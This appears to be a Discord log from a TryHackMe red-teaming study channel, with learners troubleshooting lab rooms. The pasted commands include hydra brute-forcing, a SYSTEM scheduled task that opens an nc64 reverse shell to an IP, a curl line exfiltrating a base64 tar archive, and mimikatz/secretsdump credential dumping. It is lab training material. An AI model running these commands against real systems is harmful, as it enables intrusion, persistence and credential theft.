#red-teaming-path

Now it semms working but really slow

I've removed the - in -F=

If I remove e -F= I got "[ERROR] Wrong syntax, requires three arguments separated by a colon which may not be null: /login-post/index.php"

I meant this one -

hydra -l burgess -P burgess.lst <IP> http-post-form "/login-post/index.php:username=burgess&password=^PASS^:Incorrect" -f

Did you create a new list from clinic.lst?

I simply updated your initial command.

Not sure if this is the right place to pose this question, but I'm having an issue answering a question under the "Red Team Threat Intel" room. Question asked is:

What web shell is APT 41 known to use?

I can't figure out if they are referring to the script language or the type of web shell. I've tried JScript as an answer. I've tried reverse (as in reverse shell). These seems like the only two possibilities that fit the number of characters permitted.

I was only wondering whether you have to remake the clinic.lst coz I've done it and the new file is really big and the hydra's proccess is very slow.

What room is this by the way?

Password Attacks

Has anyone encountered KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP on persistingad::Task4 when using Rubeus to request a TGT? Any ideas how to solve it?

hey any one here

hey ane here to help us

hi, would like to ask about the room - Active Directory basic room, in the third section, where it showed us how to use the delegation to allow phillip to change other users password. I did exactly the same as it showed, but somehow, i keep getting access denied when i logged to Phillip account via RDP on the window’s software, and using the power shell to change other user’s password. i tried to reboot the whole machine, if anyone also had the problem? thanks

@ivory verge You using the password displayed ? (Claire2008) And spell phillip correctly also.

yes i did,

i thinks i figured it out, the problem is i started logging in the first place wtih phillp account and try to change his priviledge to reset other user account, instead of logging in as the admin first. i believe this was the problem? so i think its a mistake i made because i was doing this task on different day and forgot about logging in as admin firrst

hi why is these two rooms are keeps loading ?
https://tryhackme.com/room/avevasionshellcode
https://tryhackme.com/room/runtimedetectionevasion

is anyone familiar on how to set up the covenant c2 over the internet

I'm on the Abusing Scheduled Tasks task. I have achieved all the flags in a single session, but in flag 9 I cannot achieve it. I have tried several times with no results.

C:\flags>flag9.exe
flag9.exe
Sorry! You are still missing something. No flag for you yet. (eleven)

any suggestions?

For which room is this?

Windows Local Persistence

I have already obtained all the other flags

note say! Note: Be sure to use THM-TaskBackdoor as the name of your task, or you won't get the flag.

schtasks /create /sc minute /mo 1 /tn THM-TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe 10.14.55.42 4449" /ru SYSTEM

hey all when it comes to os fingerprinting how reliable it is ?

To which are you referring to as being reliable for OS fingerprinting?

well i am trying to create some tool so, i needed to know the os type i was trying using nmap but its result aren't effective like most of the time it's worng

If I remember correctly, nmap tries to guess the OS based upon the responses that it receives from the target such as TTL among other things.

Yeah, it makes the decision based on responses.

Hello All - I'm doing the Credential Harvesting module and I'm on Task5. I've dumped lsass.exe to a dump file. What tool would be used to analyze this file and harvest the credentials out of it? https://tryhackme.com/room/credharvesting

Hi I'm in the phishing room doing the GoPhish simulation - Task 5 - I've followed the instructions step by step, however I still haven't received a password from the user Brian, nor has the e-mail been opened by anyone. Can anyone help me with this?

Never mind all good, I messed up the e-mail template, got it working now. 🙂

how is it possible for me to open 2 vms via the website, to do the weponisation stuff with html

How did you find the Email Samples?

You don't need two VMs, you can run the attackbox or your own Kali, and stage everything from one place. Host the payload, run a listener etc. in two terminal sessions.

Hi, can anyone confirm that the rooms 'Breaching Active Directory' and 'Enumerating Active Directory' are free or not?

Those are free, but it does require a streak of at least 7 days for non-subscribers.

Oh I see thanks.

Hi guys, I have a problem with the Room "Password Attacks" task 8. It asks me to perform a brute-forcing attack against the user phillips using hydra. I entered the command but it found 0 valid passwords.
My command:
hydra -l phillips -P clinic.lst 10.10.76.50 http-get-form '/login-get/index.php:username=^USER^&password=^PASS^:F=Login failed!'

When I try it with burp suite I get a few passwords with the code 200 and one of those passwords is the right one, but with hydra, no luck

change the failure statement or change it to a success statement

Hi, I'll be finishing the Jr. pentester path soon and I'm not sure if I should go with the offensive pentesting or red teaming path afterward 🤔 . Sometime ago I started the offensive pentesting path (31%) but now I'm not sure if I should finish it first or come to this path. Any suggestions?

There is a suggested order for completing the paths -

#general message

awesome!! thanks a lot 😄

Gave +1 Rep to @spare depot (current: #25 - 309)

but why? I don't know the password and I don't know the success statement

Make an educated guess... Also known as logout.php

Yep it worked, thank you

Gave +1 Rep to @royal void (current: #4 - 1604)

I completed the Red Teaming path yesterday! I did it after je pentestee so it was a steep curve.

Now I'm going to take it a little easier and try my hand at some offensive pentesting rooms

@nocturne sorrel apologies for the late reply. The Email template has to be manually created per the task instructions, then selected for the campaign per the drop-down box via the template name. Hope that helps.

Hi all, I'm having issues with task 7 in the Windows Internal Room. I executed the executable and got a pop-up message with the flag, but when I entered the flag for the answer it wasn't accepted as correct.

I don't know if I should post the screenshot of the flag in this room, maybe I can DM it to whoever can help me?

Just to note that copy and paste wasn't possible with the pop-up message box.

Hi all, would appreciate some help with my issue. 🙂 Not sure if there's any more information I can put here without revealing the flag. Also please let me know if this is the wrong room for this question. I have also posted it to #room-help with no response.

Issue resolved. 🙂

oh sorry for no reply... often times shadow pipes in

No problem. 🙂

still good you could figure it out on your own

Had help from #room-help haha 🙂

I do have another question regarding the same room "Windows Internals" but for Task 5.

For the question - How many DLLs were loaded by "notepad.exe"?

I filtered all the "Load Image" operations for the notepad.exe process

There should be 52 DLLs loaded? But that's not the expected answer.

Does that mean some of the 52 are not counted as "DLLs"?

@royal void would appreciate your help if you have some ideas. 🙂

could be duplicates too.... but not sure

to be honest shadow don't recall doing this room

No worries appreciate you replying. 🙂

One of those is not a .DLL (not talking about notepad.exe)

Ahh I see it now - winspool.drv - thanks @oblique marsh

Gave +1 Rep to @oblique marsh (current: #367 - 12)

https://tryhackme.com/room/signatureevasion Task 5 | tags SCP

Am I doing this incorrectly? I assume since the port is closed and I can't open it.

Solution: ||From win machine; scp Desktop\Binaries\shell.exe root@10.10.xx.xx:/root/Desktop/||
||https://www.youtube.com/watch?v=2mB4CkyMhkk||

Hello, room Password Attacks task 8: I used default credentials to access the remote machine via FTP. Using the "dir" command just tells me there are 2021 files in the current remote directory.... I guessed the name of the flag and used the "get" command but I get "550 Failed to open file" so the file does not exist... Is it that hard to get the flag or its just me missing something?

What’s a good recommendation for CEHv12 practice exam questions?

This may be better posted in the #infosec-general channel.

What to use when I have no eth0 interface? I tried ens5 interface but it didn't seem to work.

What room or network are you working on?

Room: https://tryhackme.com/room/dataxexfilt
Task: ICMP Exfil

Can you try ip a? ens5 seems to be it but according to you it didn't work.

Can you also run show options in msfconsole?

I know it says eth1 rn but i changed to ens5 upon running

It says the interface isn't required, did you try running the module without it?

Unfortunately didn't help

I'm reading about OPSEC vulnerabilities right now, and I'm confused by one about a vulnerable database

Ohhh nvm

Red team collects phishing data -> RT stores phishing data in their own vulnerable database -> RT exposes client's data

I see

Did you figure it out yet?

Nope but I wen't on with the tasks.

Hi! How can I enable the preset from postgresql?

I need help with the password attacks room for task 8 question 2. I added [List.Rules:THM-Password-Attacks]
Az"[0-9][0-9]" ^[!@]

to the bottem and launched hydra with:

ydra -l pittman@clinic.thmredteam.com -P dict.lst smtp://10.10.74.162:465 -v -I

it was not working so I checked anser and it is in wordlist

I am connected to vpn

I watched totorials and it wasnt working for them either

pls help

bruh

changed machine ip , vpn , even with kali attack box nothing is working

Are you connected to THM OpenVPN? Is the target a Windows box?

I am connected and target is win

It probably won't respond to pings then, can you RDP in as I think the room wants you to? (If you are in Weaponization room like I think you are)

ok

It worked

Cool then you should be good to go

thx

Gave +1 Rep to @fresh coral (current: #45 - 161)

I'm having an issue with Exploiting Active Directory - Exploiting Kerberos Delegation... I can't dump LSA with mimikatz. I've tried with a couple of t2 admin accounts.

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM


mimikatz # lsadump::secrets
Domain : THMWRK1
SysKey : a1403e57976b472bce5f231922ca3942
ERROR kuhl_m_lsadump_secretsOrCache ; kull_m_registry_RegOpenKeyEx (SECURITY) (0x00000005)```

I would really appreciate some help or insight

also, it's not a huge deal, but task 2 mentions logging into thmjmp1 instead of thmwrk1 under the Add Member section: "Start PowerShell (either in RDP or via SSH) on the THMJMP1 host and run the following command to add your account:"

I figured out my mistake. I wasn't using the t2_<username>'s

I'm curious in the Active Directory Credential Harvesting room in Task 4 we dumped the SAM and SYSTEM files and used impacket's secretsdump.py to decrypt them. This gives us the local hashes but not the ones for the AD accounts. The room states To Decrypt them, we need to dump the SECURITY file from the Windows file, which contains the required files to decrypt Active Directory accounts.

I grabbed the ...\config\SECURITY file and tried to run that through secretsdump.py but got the error [-] 'NoneType' object is not subscriptable. How do we use the SECURITY file?

What was your command to export the SECURITY file? What was your command when you ran secretsdump.py?

worked it out. I set the path on secretsdump.py to the correct security file path, but forgot to change the -sam flag to the -security flag

👋
Working through https://tryhackme.com/room/bufferoverflowprep an I've got a nice script working to walk through the various payloads.
One thing I can't explain is the variability - some commands I'll get a shell first try, 1-2 on the second, and of OVERFLOW4 I can't seem to get the shell at all.
I was able to debug a wierd output comparing bytearrayswrong EIP (I had inverted 2 digits in the EIP offset, so my payload was shifted ~50 bytes) using the Follow in Dump command (and understanding of the payload sent);

Can anyone help point me to a resource/tip that might help me understand why my payload/formula/script isn't working for this specific command?

I'm having some issues with why John is ignoring the --rules=THMRule option when using --wordlist and instead just processes the wordlist through Jumbo or even All no matter which rule section I specify

If anyone has suggestions or time to assist me, I would greatly appreciate it

hi guys, I wanted to ask about kerberos plz, I noticed on many blogs that the KRB_AS_REQ uses password hash to encrypt the message
so it means if I have the hash without the password I can either:
1- impersonate him and get access to things that he has access to
2- be able to decrpyt the messages he send if I could somehow man-in-the-middle

right?

#red-teaming-path

how do y'all do that idk anything

@untold cypress Yes, user's password hash is used to encrypt timestamp in Kerberos pre-authentication.

Having the user's hash you can impersonate the user in several ways.

I cannot think of useful ways one could decrypt the user's traffic (like related to NTLM or Kerberos you mentioned).

Without going too deep in Kerberos here, AS-REQ is only the beginning of Kerberos authentication and messaging. After that the messages, like related to requesting service tickets and service access, are signed / encrypted with other keys too.

@kind egret what I meant for the impersonation point:
if I can send the first message as user "Alice" at first using her hash then I can impersonate her because I am the one that the keys will be shared with, but for decryption I don't know if the hash is enough since there is other requests and keys

thank you for confirming

Gave +1 Rep to @kind egret (current: #561 - 7)

So I'm at c2 room

What is the difference between dns vs smb vs http/ https tuning

???

And why to choose one over the other

I'm having an issue in the room "Breaching Active Directory" Task 4: https://tryhackme.com/r/room/breachingad. I have confirmed I am connected to the active directory vpn and the network state for the simulated ad is running. I've gone through all the steps in the room and I'm still getting the "supportedCapabilites message when pinging from the printer website:

└─# sudo dpkg-reconfigure -p low slapd
  Backing up /etc/ldap/slapd.d in /var/backups/slapd-2.5.13+dfsg-5+b3... done.
  Moving old database directory to /var/backups:
  - directory unknown... done.
  Creating initial configuration... done.
  Creating LDAP directory... done.

┌──(root㉿kali)-[/home/kali/Desktop]
└─# sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart
SASL/EXTERNAL authentication started
SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
modifying entry "cn=config"
     
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
dn:
supportedSASLMechanisms: LOGIN
supportedSASLMechanisms: PLAIN
      
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lvp 389                                                                                    
listening on [any] 389 ...
10.200.97.201: inverse host lookup failed: Host name lookup failure
connect to [10.50.94.24] from (UNKNOWN) [10.200.97.201] 49761
0�Dc�;

x�
  objectclass0�supportedCapabilities0�P0�Fc�= 

Doing intro to C2, on the Command Control and Conquer and armitage is not on the attack box and it doesnt tell me how to install it

running armitage doesnt show anything installable

Armitage is no longer supported

That's possibly why

Did anyone have issues on "AV Evasion: Shellcode" on the first shellcode section? I get this whenever I try and compile on the attackbox

I got same problem today

I tried to install it from GitHub repo

But i am not able to open the interface

Even Installed Java - 11 too

hi, I am on task 7 of the Signature Evasion room,~~ I dont see where to upload the final exe to get the reverse shell. Any advices? Thank you~~ my bad, didn't start task 7 instance, thought it used the same as task 1

Suggest to post this in the #room-bugs channel.

Hello

AD Exploit Room

SMB access id denied

How to fix it

Hi I'm stuck on task 2 of the Signature Evasion room, I've split the binary to below the kilobyte range, but my answer is not accepted as correct. I don't know if a decimal or hexadecimal format is accepted, or if I'm going about this the wrong way?

Also I tried to use ThreatCheck in task 3 to verify my answer to task 2, but I got this exception when running ThreatCheck:

Can i have 3 more votes to reset the network in the Exploiting Active Directory room?

This would help if you state your subnet.

My bad, it's 10.200.143.0/24

Hi I'm trying to get the flag for task 10 in the "Evading Logging and Monitoring" room. I've followed the walkthrough to disable script block, script block invocation and module logging as well as to clear logs from "Windows Powershell" and "Application/Microsoft/Windows/PowerShell/Operational" locations, however when running the agent I still get the "Traffic halted, you got caught" message. Is there anything else I didn't do?

Is it an issue with running the agent too early or too late?

Can anyone let me know what the "Traffic halted, you got caught" message is meant to indicate?

Might be a custom message for the target?

Not too sure what that message is meant to convey though. With "Binary leaked" it's because agent.exe showed up in the logs but I'm not too sure what the correlation is between "traffic halted" and detection is. I'm probably missing something pretty obvious. 🙂

I haven't done the room yet, but from what I can understand, your binary touched a process it shouldn't, thus being detected.

My input is meant to be a PowerShell script rather than a binary. But maybe I deleted some logs that I shouldn't have?

Hi as previously reported for task 3 of the Signature Evasion room I keep on getting the following exception: "IOException: The process cannot access the file 'C:\temp\file.exe' because it is being used by another process" whenever I run ThreatCheck.exe on shell.exe. This is stopping me from finishing Task 3. Anyone has any ideas how to solve this, or is it a bug in the room?

New screenshot here:

I was able to compile and run ThreatCheck successfully on my own Windows 10 VM, but the answer it gave was not accepted as the right answer for the task. Could this be a room bug?

Managed to get the right answer through manual splitting of the binary instead of running ThreatCheck. ThreatCheck not working as expected is still a bug though.

Hey all, I'm working on the "Online Password Attacks" Q#3 that requires a login-get URI. I feel that I'm trying the correct hydra command but I get nothing back. My command is "hydra -l phillips -P clinic.lst 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f", I've also tried S=302 and get nothing either. Can anyone tell me where I'm going wrong?

10.10.x.x did you redact the IP address for discord or is that the command you ran?

I redacted it for Discord

Sorry that I ask, but you never know...

Redacting Ip's is bad IMO, I can't help fully without knowing the IP.

Sometimes people launch the attackbox and use that IP and wonder why stuff doesn't work.

This works for me hydra -l phillips -P clinic.lst 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f

I don't see how it's different from yours, but it works.

What I don't understand is why this doesn't work: hydra -l phillips -P clinic.lst 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:F=failed"
If I send a request manually the response contains "failed", so the F= should match that and hydra display everything that does not fail. Instead I get no result.

Yeah, I don't know. I've tried with the Kali attack machine and my personal Kali using the VPN. I get the same results, nothing.

I can DM you the password I get from the first one, which looks identical to yours, if you want. Still would like to know why my other version doesn't work.

I appreciate it. I was more interested in seeing if I was doing anything wrong. It seems like it may be an issue somewhere else.

I got a question, how do I bring a file into one of the windows machines when there's no internet on the machine?
For context, I'm on Task 6 for the living off the land room.
I tried using Certutil and others, but I haven't been able to get the file onto the machine. Anyhow, thank you!

I don't know that room, but to get a file from the attackbox to a target you can start an http server on the attackbox with python3 -m http.server 4242 in the folder in which the file is located. Then on the target wget ATTACKBOX_IP:4242/FILENAME to download it.

Okay, thank you I'm gonna try that right now

Not too relevant on THM, but for good measure: If you start an http server this way it makes every file in the same folder accessible. Also files you might not want to share with others. To be save: create a folder, put the file you want to move into the folder, cd into the folder and start the http server there.

for example
mkdir server-dir mv myfile server-dir cd server-dir python3 -m http.server 4242

I prefer updog to transfer files.

i have a problem with Lateral Movement and Pivoting lap I cant get shell from psexec and I saw a clock with 45 is that mean this machine will disappear after 45 min?

You can add an hour at any time

Hi team,
I just wonder to where Breaching AD room should redirect me. Now it's redirecting to My Rooms and I'm unsure how to continue study. Should I pick up some room from the list? I don't know which one.

The reason it is directing you to my rooms is you probably do not have the required streak.

For non-subscribers, there is usually a 7-day streak requirement before you are allowed access to those rooms.

Thank you. I'm on my way to subscribe again 🙂

Can anyone suggest tool name's which is used to build malicious apks like 888 rat, spynote etc

Why do you want to learn this?

Your question answers itself! My desire to become a hacker stems from a deep passion for cybersecurity and technology. Without knowledge of tools and technology, I can't achieve my goal of becoming a skilled hacker. It’s essential to start with the basics to build a solid foundation. This learning journey is crucial for anyone serious about mastering the art and science of hacking

It makes you seem like you'd like to be a black hat hacker....

I want to learn hacking because understanding the tools and techniques used in cybersecurity is essential, regardless of how we label hackers. The distinction between black hat and white hat hackers is based on their actions and intentions, much like how we differentiate good and bad people. Learning these skills is crucial for anyone in cybersecurity. Even ethical (white hat) hackers need to know about these methods to effectively protect systems. It's about using this knowledge responsibly to secure and defend against potential threats.

Yes, but you do realise we have a fair number of members who wish to learn these tools for the opposite reason.

anyone could recommend some good reverse engineering resources like free Books, online courses, or tutorials. Thanks in advance!

lowlevellearning, one of the most low level and assembly type of youtubers, has a lot of videos on how to start learning, things to keep in mind, ctf challenges, rust, c, etc.

other than that, I think crackmes.one offers a lot of ctf for reverse engineering

is there a way to copy and paste from the attack box to the 'start machine'?

To the target / victim, you mean? There's a couple. You could use http.server from the attackbox and fetch it using wget, another would be to send the file using nc in the Attackbox and a listener on the target, setup an ftp server on the Attacknox and connect to it from the target, etc.

im on task 5 of weaponization and im just following along the instructions and it says to copy from attack box to victim machine(windows) to create a macro, but I am unable to do that.

but i guess and can try what u suggested

I paste into the search bar on the browser, and then copy from there, click on attackbox or targetbox. a box will appear that says 'paste' now your stuff is in clipboard

I don't usually use split view

In Weaponization - task 2. the xfreerdp does not seem to be recognizing the credentials.

probably because some of the characters are interpeted by the shell... try placing the creds in ''

"xfreerdp /v:10.10.65.146 /u:"thm" /p:"TryHackM3" +clipboard
loading channel cliprdr
connected to 10.10.65.146:3389
SSL_read: Failure in SSL library (protocol error?)
SSL_read: error:14094419:SSL routines:ssl3_read_bytes:tlsv1 alert access denied
credssp_recv() error: -1
Authentication failure, check credentials.
If credentials are valid, the NTLMSSP implementation may be to blame.
Error: protocol security negotiation or connection failure"

oh huh wonder what went wrong there

Try /enforce-tlsv1_2

C++

Anyone get ad enumeration room open to your work?

I keep getting problem with Tun vs Tap setting, and I cannot seem to find any help online

I tried using the attackbox to complete the room, but the machine is not even connected to the adenumeration network

#enumerating-ad message

Hello everyone. I have a question about the port used by wmi. Wmi does not need to use 5985 or 5986, right? These two ports are used by winrm.

Remote Process Creation Using WMI
Ports:
135/TCP, 49152-65535/TCP (DCERPC)
5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)
Required Group Memberships: Administrators

Hi y'all, having an issue with the Breaching AD network, specifically configuring slapd rogue LDAP to only take PLAIN and LOGIN even with following directions from the room

Attaching my modified config file and the cmds + outputs from making the changes. Would really appreciate some assistance, I'm sure I'm just overlooking something simple

Hello all I have a question. In the Attack box how do I make myself a reg user and not root?

You could probably create a new user? Why though? There are commands or tools that need root-level access to run completely.

Its asking me to run a command as a non rooted user.

Hi, i am in the following room (https://tryhackme.com/r/room/weaponization) Task 9. I am a little bit confused about the upload input. I uploaded my payload and visited it, but it is not working? Is this upload input just for confusing reasons?

Did you set a listener on your own machine to wait on a call back?

Hello guys, password attacks room, task 4, question 2 (What is the crunch command to generate a list containing THM@% and output to a file named tryhackme.txt?) when I submit this answer => crunch 5 5 -t "THM@%" -o tryhackme.txt
it says answer is incorrect. I tried many many times with different answers but this is the correct one, tho its not working. any help?

That's incorrect. If you want to include special characters...what symbol do you use??

Yes right I got it

im a bit lost on task 4 of password attack, second question. according to the hint, i am to use "5 5" for the min-max character but the question requires 7 characters

You're looking for % # ?

in the empty answer box, there are asterisks that coordinates with the answer. "crunch 5 5 -t ******* -o tryhackme.txt". if I am to use THM@% which is 5 characters, this will not be proper since the asterisk require 7 characters. Im not sure what it is that i am misunderstanding with this problem.

does anyone have a working username_generator

You are able to.

You need to use thm

I figured it out thx

Gave +1 Rep to @vast quest (current: #1 - 2531)

what is the proper syntax for hydra using http-get-form. Im stuck on password attacks task 8. i used all the examples given but nothing is working, keep getting error messages

http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f

that wasnt it. I just figured it out. i kept getting an error:"There is no service http", which was really confusing me cuz according to the examples - thats whats being used.

wrong target machine??

its the right target machine. the issue was that instead of "http://10.10.x.x" im suppose to put "http-get://10.10.x.x."

oh nah

hydra -l phillips -P clinic.lst 10.10.48.200 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f

this is the exact command shadow used to get the correct answer

ive tried that. it didnt work

weird

should work with the success statement pointing to the logout.php

i just checked my history of commands, i actually didnt do it exactly like that, i did leave one thing on there which gave the error

so why is the question requesting a particular format when its not necessary?

password attacks;task 8, found the passwords for last two questions, but no flag. Now what?! isnt there suppose to be a login screen for me to test this?

Hello guys, is there anyone facing a problem with connecting to Enumerating AD room VPN network?

2024-08-03 14:21:18 [server] Peer Connection Initiated with [AF_INET]54.171.116.83:1194
2024-08-03 14:21:18 TLS: move_session: dest=TM_ACTIVE src=TM_INITIAL reinit_src=1
2024-08-03 14:21:18 TLS: tls_multi_process: initial untrusted session promoted to trusted
2024-08-03 14:21:19 SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)
2024-08-03 14:21:19 PUSH: Received control message: 'PUSH_REPLY,route 10.200.33.0 255.255.255.0,route-metric 1000,route-gateway 10.50.9.1,topology subnet,ping 5,ping-restart 120,ifconfig 10.50.9.2 255.255.255.0,peer-id 0'
2024-08-03 14:21:19 OPTIONS IMPORT: --ifconfig/up options modified
2024-08-03 14:21:19 OPTIONS IMPORT: route options modified
2024-08-03 14:21:19 OPTIONS IMPORT: route-related options modified
2024-08-03 14:21:19 Using peer cipher 'AES-256-CBC'
2024-08-03 14:21:19 Error: problem with tun vs. tap setting
2024-08-03 14:21:19 Exiting due to fatal error

I tried to regenerate network vpn but its still not working.

Attackbox or vm?

my VM

BreachingAD and Lateral Movement and pivoting VPNs were working perfectly

Edit your config

and change the dev enumad to dev tun

Thank you bro, it worked!

Gave +1 Rep to @vast quest (current: #1 - 2562)

No worries sister!

oh sorry for assuming ur gender.. i guess ur a lady?

I'm not. 😄

But it's good practice to not use them if unsure 🙂

Yea my bad, didn't think about it.

anyways, have a good day!

and thank you again ^_^

in intro to c2

Hi, I just finished the pre security path, for you can I directly engage the red teaming path?

It depends on your experience and background. In any case, you can jump straight into any path you choose, but do expect that it could be relatively difficult without the needed foundational knowledge.

I'm new in the cybersecurity field, I have only done the pre security path here on thm, so what do you suggest me to do?

There is a recommended path posted somewhere on this discord.

#general message

Thanks

Gave +1 Rep to @spare depot (current: #11 - 644)

I need a hint for windows privilege escalation task 7

Can you add a link to the room so it is easier for folks to help you out?

https://tryhackme.com/r/room/windowsprivesc20

I already called it a night. Ill try again later. but basically I cant get the administrator permission

Is it the case study?

yes

https://tryhackme.com/r/room/windowsprivesc20

using the instructions ive tried multiple ways to properly execute the Druva program but nothing seems to work. Ive read the whole task over and over again but still not understanding what it is im doing wrong.

everytime i run the command it just opens the file in notepad

In the room AV Evasion: Shellcode I am trying to create new user to conclude the course and find a solution for task 2 but the last paylaod given (to test) does not work for the machine, I compiled the C# code, used Confuser and run the new program but telling me there is an error in the syntax of the command 😅, I think it comes from the fact that we are running 2 commands but does there is another way to add the user + add it to admin group?

When I tried to add my current user to admin group, it told me I can't do that so...

I found the video of someone to complete the room but if someone has a valid payload, I take it :).

They also made somewhat of a pathway on the Learn section finally, after I emailed them about it 3 years ago.

I see several posts here regarding the BreachingAD network, dating back to 6+ months ago. I'm using the AttackBox and launching it from the BreachingAD page (as specified). The interface that is supposed to be on that box "breachad" is not present.

Did anyone find the proper room to get the proper launch conditions for that interface in particular, another room that launches the same one, or find config changes/workarounds other than connecting to OpenVPN on another box? I tried launching the AttackBox from all paths/modules yesterday, nothing different. And now that I'm thinking about it, none of the other boxes within this same AD path are launching with their labeled interfaces either, such as: lateralmovement or whatever else

https://tryhackme.com/r/room/breachingad

Double check your VPN files aren't blank.

On the built-in AttackBox?

Yes.

Sure. Where?

In the NetworkConfig directory on the Desktop.

All are blank

That's why there is no interfaces.

You'll need to leave the room with options and try a new subnet.

Does that mean leave the room and just re-join it?

With the options menu

Is this what you're saying?

Leave with the options menu. Then just re-join the room?

Yes.

Tried that yesterday and again just now. Still all blank.

Anyone have ideas on getting Attackbox to grab the right configs for these boxes?

I took the time to remove myself from ALL rooms (9 pages) I had previously joined. It fails to remove me from only 1, Active Directory Basics.

I wonder if this is causing some odd conditions since I can't actually leave it or join it properly. 🤷‍♂️ (Still doesn't get the correct VPN files)

Hey goofy question:

I'm in the Data Exfiltration room and trying to use tmux on the jump box

the split windows commands aren't working

I've tried ctrl-b + %

ctrl-b followed by percent

and nothing happens

Am I missing a step after opening tmux from the thm@jump-box session?

Thank you to any and all who see this btw!

lol figured it out...

this path is too confusing for me, is there anything I could do to gain enough knowledge about what I'm dealing with?

There is a recommended order to do the learning paths in the pins of #general that may be helpful to you or you could do some outside research on specific things you find confusing and find dedicated resource for those given topics.

Hard to give specific recommendations without knowing what you don't feel like you have enough knowledge on

the thing is I've completed
#pre-security-legacy-path #974406074444685322 #878393611929129000 #web-fundamentals-path #junior-pentester-path #offensive-pentesting-path
yet I still feel like I don't know much

Did you take notes during all of that? Did you do more research whenever you wanted to known more about something or were confused? There is a lot to learn for sure, it takes a while to get to know these things

I don't do notes, but I do some research when I get confused about how some of the things work

Well notes are very important in the this field, you're not going to remember everything, but if you have solid notes to reference that goes a long way

Perhaps start taking some?

maybe I should but idk how and what to note

Everyone takes notes differently, best to just start trying and see what ends up working for you

I might go back to older rooms maybe redo them, take notes and do more research

especially windows rooms, I struggle with them the most

in "Red Teaming>Post Compromise>Windows Local Persistence>task4(abusing services), I properly put in the command to create the service then used the command to start the service. The command to start the service fails. What am i missing? Ive tried in both cmd and PS. both services were created successfully.

I can't able to join room for the active Directory rooms like Breaching Active Directory .

Are you a sub or streak of > 7

No

Ah, those are required to join the room.

Hey i’m interested in the red path can someone provide me some guidance? what should i do in what order

The Learning Roadmap on THM is a good guide https://tryhackme.com/r/hacktivities. If you have IT experience you can start with #junior-pentester-path

@vast quest First time I'm checking since last month, network interfaces seem to be up on the attackbox now for the Active Directory rooms. Probably already confirmed working by now but just another heads/thumbs up.

A few weeks later I am having the same struggle. What did you do to get tmux working in the session?

Does the red teaming path just... not give any points at all? kind of sad for a "Hard" difficulty path to not be increasing my THM score 🙂 not a big deal, though. Just a shame to be spending tens of hours on something and not contributing to my team's achievements goals re: points per month

Hey guys, Is Red Teaming Path is enough to pass CRTP ???

Haven't done so myself, but have you checked the areas / topics covered? I don't think it does as THM would probably mention it somewhere similar to what was done for CompTIA Pentest+, but better to compare it yourself.

Crtp has training with the voucher right just go through that heard thats enough to pass and the AD rooms in thm could help a bit but not necessary the CRTP course is enough to pass it

.

Hi all, i need help. Data Exfiltration on task 8, after Edit Netplan Configuration File and try to Apply the Netplan Changes, i got an error messege like this, how to fix it?

hi

hey guys i'm new here

how can i join red team can someone help me

Subscribe to THM premium and enrole to Red Teaming Path

@rare ravine nah that is my firstime to see the guy dethrone me in the king

https://tenor.com/view/cry-crying-cat-crying-cat-cry-why-gif-27571714

youre toying me

https://tenor.com/view/blackish-crying-cry-tears-sad-gif-5613528

never underestimate anyone!

ik youre laughing while youre typing that

https://tenor.com/view/cat-no-nonono-noooo-cat-no-gif-13597132752790194338

https://tenor.com/view/boulevard-kid-crying-burger-gif-20015465

@rare ravine wait im investigating like a pro forensic analyst

https://tenor.com/view/kekw-twitch-twitchtv-twitch-emote-kek-gif-19085736

what did you found?

i just stuck inside the vim and i cannot go out lmfao

i hate vim so much

i saw that

needs tty

hmm this must be a kind of superuserland been used

upon my forensic invistigation i just found myself dumb

@rare ravine we are in the wrong channel

lmfao

i finished the breaching AD a while ago w/o a problem

now in enumerating AD seems to be the problem cant get the creds

i can ping the THMDC

is this the reason why i cannot get the creds? its down? lol

Yes.

nahh it's down since a while ago almost 7hrs 🥲

But it's still restarting.

yeah its restarting since a while ago

thm@victim1:~$ curl --data "file=$(tar zcf - task6 | base64)" http://web.thm.com/contact.php
curl: (7) Failed to connect to web.thm.com port 80: Connection refused
Data Exfiltration Room. Not sure why I am getting this error. Its on attackthebox, I literally followed a walkthrough step by step and for some reason this command just is not having it

task6

exfiltrate using http(s)

Hi

Just a heads up, the thm user (in admin shell) in Credential Harvesting within the Red Team Path can read the AdmPwd without needing to use the creds for bk-admin in Task 8. You already have those creds by that point, so not the end of the world. Just unsure if that was the intention or not.

signature evasion task 2 poorly explained

the GIF that was originaly there needs to be put back

Can you share an image of what that is? You'll need to verify your account before doing so though.

@bronze sierra

https://www.youtube.com/watch?v=aJBu_v8_fvo&t=863s in this video starting of it compared to how it looks now

I have finished the room anyway now but in case u need feedback or change things

same same🥲

Is this room ezy?

yes and not depends on you

but a lot of writeups outhere

Anyone had this problem too? I'm at Task 5 Offline Attacks - Dictionary and Brute-Force and I want to answer Q2.
I have this Input and Output:
hashcat -m 100 -a 0 8d6e34f987851aa599257d3831a1af040886842f /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1-66-g6a419d06) starting...

• Device #2: Outdated POCL OpenCL driver detected!

